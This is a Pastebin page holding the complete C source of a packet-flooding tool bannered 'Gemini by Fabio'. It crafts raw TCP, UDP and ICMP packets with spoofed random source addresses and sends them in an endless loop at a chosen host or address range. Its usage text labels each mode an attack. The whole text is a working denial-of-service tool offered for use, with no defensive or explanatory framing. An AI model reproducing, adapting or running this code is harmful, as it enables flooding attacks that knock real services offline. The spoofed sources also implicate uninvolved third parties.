Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <netdb.h>
- #include <sys/types.h>
- #ifdef F_PASS
- #include <sys/stat.h>
- #endif
- #include <netinet/in_systm.h>
- #include <sys/socket.h>
- #include <string.h>
- #include <time.h>
- #include <signal.h>
- #ifndef __USE_BSD
- # define __USE_BSD
- #endif
- #ifndef __FAVOR_BSD
- # define __FAVOR_BSD
- #endif
- #include <netinet/in.h>
- #include <netinet/ip.h>
- #include <netinet/tcp.h>
- #include <netinet/udp.h>
- #include <netinet/ip_icmp.h>
- #include <arpa/inet.h>
- #ifdef LINUX
- # define FIX(x) htons(x)
- #else
- # define FIX(x) (x)
- #endif
- #define PSIZE 65535
- #define TCP_ACK 1
- #define TCP_FIN 2
- #define TCP_SYN 4
- #define TCP_RST 8
- #define UDP_CFF 16
- #define ICMP_ECHO_G 32
- #define TCP_NOF 64
- #define TCP_URG 128
- #define TCP_PSH 258
- #define TCP_ECE 512
- #define TCP_CWR 1024
- #define TH_NOF 0x0
- #define TH_FIN 0x01
- #define TH_SYN 0x02
- #define TH_RST 0x04
- #define TH_PUSH 0x08
- #define TH_ACK 0x10
- #define TH_URG 0x20
- #define TH_ECE 0x40
- #define TH_CWR 0x80
- #define TCP_ATTACK() (a_flags & TCP_ACK ||\
- a_flags & TCP_FIN ||\
- a_flags & TCP_SYN ||\
- a_flags & TCP_RST ||\
- a_flags & TCP_NOF ||\
- a_flags & TCP_PSH ||\
- a_flags & TCP_ECE ||\
- a_flags & TCP_CWR ||\
- a_flags & TCP_URG )
- #define UDP_ATTACK() (a_flags & UDP_CFF)
- #define ICMP_ATTACK() (a_flags & ICMP_ECHO_G)
- #define CHOOSE_DST_PORT() dst_sp == 0 ?\
- random () :\
- htons(dst_sp + (random() % (dst_ep -dst_sp +1)));
- #define CHOOSE_SRC_PORT() src_sp == 0 ?\
- random () :\
- htons(src_sp + (random() % (src_ep -src_sp +1)));
- #define SEND_PACKET() if (sendto(rawsock,\
- &packet,\
- (sizeof packet),\
- 0,\
- (struct sockaddr *)&target,\
- sizeof target) < 0) {\
- perror("sendto");\
- exit(-1);\
- }
- /* linux cksum */
- #define BANNER_CKSUM 54018
- /* sunos cksum */
- //#define BANNER_CKSUM 723
- int psize = 0;
- u_long lookup(const char *host);
- unsigned short in_cksum(unsigned short *addr, int len);
- static void inject_iphdr(struct ip *ip, u_char p, u_char len);
- char *class2ip(const char *class);
- static void send_tcp(u_char th_flags);
- static void send_udp(u_char garbage);
- static void send_icmp(u_char garbage);
- char *get_plain(const char *crypt_file, const char *xor_data_key);
- static void usage(const char *argv0);
- u_long dstaddr;
- u_short dst_sp, dst_ep, src_sp, src_ep;
- char *src_class, *dst_class;
- int a_flags, rawsock;
- struct sockaddr_in target;
- struct pseudo_hdr {
- u_long saddr, daddr;
- u_char mbz, ptcl;
- u_short tcpl;
- };
- struct cksum {
- struct pseudo_hdr pseudo;
- struct tcphdr tcp;
- };
- struct {
- int gv;
- int kv;
- void (*f)(u_char);
- } a_list[] = {
- { TCP_ACK, TH_ACK, send_tcp },
- { TCP_FIN, TH_FIN, send_tcp },
- { TCP_SYN, TH_SYN, send_tcp },
- { TCP_RST, TH_RST, send_tcp },
- { TCP_NOF, TH_NOF, send_tcp },
- { TCP_URG, TH_URG, send_tcp },
- { TCP_PSH, TH_PUSH, send_tcp },
- { TCP_ECE, TH_ECE, send_tcp },
- { TCP_CWR, TH_CWR, send_tcp },
- { UDP_CFF, 0, send_udp },
- { ICMP_ECHO_G, ICMP_ECHO, send_icmp },
- { 0, 0, (void *)NULL },
- };
- int
- main(int argc, char *argv[])
- {
- int n, i, on = 1;
- int b_link;
- #ifdef F_PASS
- struct stat sb;
- #endif
- unsigned int until;
- a_flags = dstaddr = i = 0;
- dst_sp = dst_ep = src_sp = src_ep = 0;
- until = b_link = -1;
- src_class = dst_class = NULL;
- while ( (n = getopt(argc, argv, "T:RUINs:h:d:p:q:l:x:t:")) != -1) {
- char *p;
- switch (n) {
- case 'T':
- switch (atoi(optarg)) {
- case 0: a_flags |= TCP_ACK; break;
- case 1: a_flags |= TCP_PSH; break;
- case 2: a_flags |= TCP_RST; break;
- case 3: a_flags |= TCP_SYN; break;
- case 4: a_flags |= TCP_URG; break;
- case 5: a_flags |= TCP_FIN; break;
- case 6: a_flags |= TCP_ECE; break;
- case 7: a_flags |= TCP_CWR; break;
- }
- break;
- case 'U':
- a_flags |= UDP_CFF;
- break;
- case 'R':
- a_flags |= rand();
- break;
- case 'I':
- a_flags |= ICMP_ECHO_G;
- break;
- case 'N':
- a_flags |= TCP_NOF;
- break;
- case 's':
- src_class = optarg;
- break;
- case 'h':
- dstaddr = lookup(optarg);
- break;
- case 'd':
- dst_class = optarg;
- i = 1;
- break;
- case 'x':
- psize = atoi(optarg);
- break;
- case 'p':
- if ( (p = (char *) strchr(optarg, ',')) == NULL)
- usage(argv[0]);
- dst_sp = atoi(optarg);
- dst_ep = atoi(p +1);
- break;
- case 'q':
- if ( (p = (char *) strchr(optarg, ',')) == NULL)
- usage(argv[0]);
- src_sp = atoi(optarg);
- src_ep = atoi(p +1);
- break;
- case 'l':
- b_link = atoi(optarg);
- if (b_link <= 0 || b_link > 100)
- usage(argv[0]);
- break;
- case 't':
- until = time(0) +atoi(optarg);
- break;
- default:
- usage(argv[0]);
- break;
- }
- }
- if ( (!dstaddr && !i) ||
- (dstaddr && i) ||
- (!TCP_ATTACK() && !UDP_ATTACK() && !ICMP_ATTACK()) ||
- (src_sp != 0 && src_sp > src_ep) ||
- (dst_sp != 0 && dst_sp > dst_ep))
- usage(argv[0]);
- srandom(time(NULL) ^ getpid());
- if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
- perror("socket");
- exit(-1);
- }
- if (!psize)
- psize = PSIZE;
- if (setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL,
- (char *)&on, sizeof(on)) < 0) {
- perror("setsockopt");
- exit(-1);
- }
- target.sin_family = AF_INET;
- for (n = 0; ; ) {
- if (b_link != -1 && random() % 100 +1 > b_link) {
- if (random() % 200 +1 > 199)
- usleep(1);
- continue;
- }
- for (i = 0; a_list[i].f != NULL; ++i) {
- if (a_list[i].gv & a_flags)
- a_list[i].f(a_list[i].kv);
- }
- if (n++ == 100) {
- if (until != -1 && time(0) >= until) break;
- n = 0;
- }
- }
- exit(0);
- }
- u_long
- lookup(const char *host)
- {
- struct hostent *hp;
- if ( (hp = gethostbyname(host)) == NULL) {
- perror("gethostbyname");
- exit(-1);
- }
- return *(u_long *)hp->h_addr;
- }
- #define RANDOM() (int) random() % 255 +1
- char *
- class2ip(const char *class)
- {
- static char ip[16];
- int i, j;
- for (i = 0, j = 0; class[i] != '\0'; ++i)
- if (class[i] == '.')
- ++j;
- switch (j) {
- case 0:
- sprintf(ip, "%s.%d.%d.%d", class, (int) random() % 245+1, (int) random() % 225+1, (int) random() % 215+1);
- break;
- case 1:
- sprintf(ip, "%s.%d.%d", class, (int) random() % 245+1, (int) random() % 215+1);
- break;
- case 2:
- sprintf(ip, "%s.%d", class, (int) random() % 245+1);
- break;
- default: strncpy(ip, class, 16);
- break;
- }
- return ip;
- }
- unsigned short
- in_cksum(unsigned short *addr, int len)
- {
- int nleft = len;
- int sum = 0;
- unsigned short *w = addr;
- unsigned short answer = 0;
- while (nleft > 1) {
- sum += *w++;
- nleft -= 2;
- }
- if (nleft == 1) {
- *(unsigned char *) (&answer) = *(unsigned char *)w;
- sum += answer;
- }
- sum = (sum >> 16) + (sum & 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return answer;
- }
- static void
- inject_iphdr(struct ip *ip, u_char p, u_char len)
- {
- ip->ip_hl = 5;
- ip->ip_v = 4;
- ip->ip_p = p;
- ip->ip_tos = 0x08;
- ip->ip_id = random();
- ip->ip_len = len;
- ip->ip_off = 0;
- ip->ip_ttl = 255;
- ip->ip_dst.s_addr = dst_class != NULL ?
- inet_addr(class2ip(dst_class)) :
- dstaddr;
- ip->ip_src.s_addr = src_class != NULL ?
- inet_addr(class2ip(src_class)) :
- random();
- target.sin_addr.s_addr = ip->ip_dst.s_addr;
- }
- static void
- send_tcp(u_char th_flags)
- {
- struct cksum cksum;
- struct packet {
- struct ip ip;
- struct tcphdr tcp;
- } packet;
- memset(&packet, 0, sizeof packet);
- inject_iphdr(&packet.ip, IPPROTO_TCP, FIX(sizeof packet));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip,0);
- cksum.pseudo.daddr = dstaddr;
- cksum.pseudo.mbz = 0;
- cksum.pseudo.ptcl = IPPROTO_TCP;
- cksum.pseudo.tcpl = htons(sizeof(struct tcphdr));
- cksum.pseudo.saddr = packet.ip.ip_src.s_addr;
- packet.tcp.th_win = 65535;
- packet.tcp.th_seq = random();
- packet.tcp.th_ack = 0;
- packet.tcp.th_flags = th_flags;
- packet.tcp.th_off = 5;
- packet.tcp.th_urp = 1;
- packet.tcp.th_sport = CHOOSE_SRC_PORT();
- packet.tcp.th_dport = CHOOSE_DST_PORT();
- cksum.tcp = packet.tcp;
- packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));
- SEND_PACKET();
- }
- static void
- send_udp(u_char garbage)
- {
- struct packet {
- struct ip ip;
- struct udphdr udp;
- } packet;
- memset(&packet, 0, sizeof packet);
- inject_iphdr(&packet.ip, IPPROTO_UDP, FIX(sizeof packet));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip,0);
- packet.udp.uh_sport = CHOOSE_SRC_PORT();
- packet.udp.uh_dport = CHOOSE_DST_PORT();
- packet.udp.uh_ulen = htons(sizeof(struct udphdr) + psize);
- packet.udp.uh_sum = 0;
- SEND_PACKET();
- }
- static void
- send_icmp(u_char gargabe)
- {
- struct packet {
- struct ip ip;
- struct icmp icmp;
- } packet;
- memset(&packet, 0, sizeof packet);
- inject_iphdr(&packet.ip, IPPROTO_ICMP, FIX(sizeof packet));
- packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
- packet.icmp.icmp_type = ICMP_ECHO;
- packet.icmp.icmp_code = 0;
- packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
- SEND_PACKET();
- }
- const char *banner = "\e[1;37m(\e[0m\e[0;31mGemini\e[0m\e[1;37m)\e[0m-\e[1;37mby\e[0m-\e[1;37m(\e[0m\e[0;31mFabio\e[0m\e[1;37m)\e[0m";
- static void
- usage(const char *argv0)
- {
- printf("%s \n", banner);
- printf(" -U UDP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
- printf(" -I ICMP attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
- printf(" -N Bogus attack \e[1;37m(\e[0m\e[0;31mno options\e[0m\e[1;37m)\e[0m\n");
- printf(" -T TCP attack \e[1;37m[\e[0m0:ACK 1:PSH\e[1;37m]\e[0m\n");
- printf(" \e[1;37m[\e[0m2:RST 3:SYN\e[1;37m]\e[0m\n");
- printf(" \e[1;37m[\e[0m4:URG 5:FIN\e[1;37m]\e[0m\n");
- printf(" \e[1;37m[\e[0m6:ECE 7:CWR\e[1;37m]\e[0m\n");
- printf(" -h target host/ip \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
- printf(" -d destination class \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -s source class/ip \e[1;37m(\e[m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -p destination port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -q source port range [start,end] \e[1;37m(\e[0m\e[0;31mrandom\e[0m\e[1;37m)\e[0m\n");
- printf(" -l pps limiter \e[1;37m(\e[0m\e[0;31mno limit\e[0m\e[1;37m)\e[0m\n");
- printf(" -t timeout \e[1;37m(\e[0m\e[0;31mno default\e[0m\e[1;37m)\e[0m\n");
- printf(" -x udp length \e[1;37m(\e[0m\e[0;31m1-65535\e[0m\e[1;37m)\e[0m\n");
- printf("\e[1musage\e[0m: %s -T0 -U -h 12.12.12.12 -x5\n", argv0);
- exit(-1);
- }
Add Comment
Please, Sign In to add comment